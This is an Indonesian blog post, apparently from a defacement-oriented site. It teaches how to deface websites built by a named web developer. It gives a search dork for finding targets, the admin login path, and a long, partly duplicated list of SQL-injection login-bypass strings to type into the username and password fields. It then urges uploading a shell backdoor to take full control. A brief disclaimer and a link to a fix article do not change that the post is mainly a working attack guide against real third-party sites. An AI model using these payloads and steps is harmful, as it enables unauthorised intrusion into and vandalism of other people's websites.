Menerobos kedalam website orang lain memang tidak dibenarkan. Banyak sekali tutorial untuk melakukannya salah satu caranya dengan bypass login dan pada kesempatan kali ini kami ingin berbagi Cara Deface Bypass Admin dengan dork "Zoom Web Media" . Kami telah banyak menulis mulai dari dork terbaru bypass admin dan beberapa tutorialnya. Kamu bisa mencarinya dengan kata kunci "Bypass Admin" pada blog ini.
Sebelum masuk ke tutorial mari kita membahas sedikit tentang POC Bypass Admin, yang sering digunakan oleh defacer. Bug ini sederhana tetapi sangat berbahaya, Jika seseorang telah menemukan sebuah halaman admin untuk sebuah website. Karena jika admin web tersebut menggunakan sebuah script untuk dashboard admin tanpa adanya filterisasi karakter bisa mengakibatkan adanya Bug.
Baca Juga : Kumpulan Website Vuln SQL Indonesia
Jadi tanpa menggunakan username dan password. Orang lain mampu masuk dashboard admin melalui form login contoh inject seperti '=''OR' atau ' or 1=1 limit 1 -- -+ Jika kamu ingin mencoba memperbaikinya bisa baca artikel kami tentang Cara Menutup Bug Bypass Admin
Sebenarnya ada banyak sekali kode inject bypass admin contohnya seperti dibawah ini :
' or 1=1 limit 1 -- -+
'=''OR'
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Kode diatas bisa sebagai referensi kamu jika ingin mencoba Deface dengan bypass admin. Seperti tutorial dibawah ini.
Deface Bypass Admin Zoom Web Media
Pertama kamu mencari Kumpulan Website yang mempunyai Bug Bypass Admin dengan menggunakan dork Powered by "zoom web media"
Ada banyak website yang dibuat atau dikembangkan oleh zoomwebmedia biasanya jika satu website ada bug dari salah satu metode deface, Maka semua website yang dibuat oleh pengembang mempunyai dampak yang sama.
Baca Juga : 1000+ Admin Panel URL List
Login Halaman Admin
Jika sudah memilih website, untuk menuju ke login admin masukan link /zoom-admin/login.php dibelakang alamat website. Contoh http://target.com/zoom-admin/login.php
Selanjutnya masukan kode inject ' or 1=1 limit 1 -- -+ pada form username dan password dan klik login.
Kamu akan masuk kedalam website tanpa username dan password. Jika kamu ingin mendapatkan semua akses di website ini, harus memasukan backdoor. Jika belum mempunyai backdoor kamu juga bisa mencarinya pada blog ini kami mempunyai beberapa shell backdoor.
Baca Juga : Dork Ampuh Sebagai Senjata Deface
Ada beberapa website yang langsung support dengan ekstensi Php/Phtml. Jadi kamu bisa upload tanpa harus menggunakan tamper data atau burpsuite. Sekian semoga bermanfaat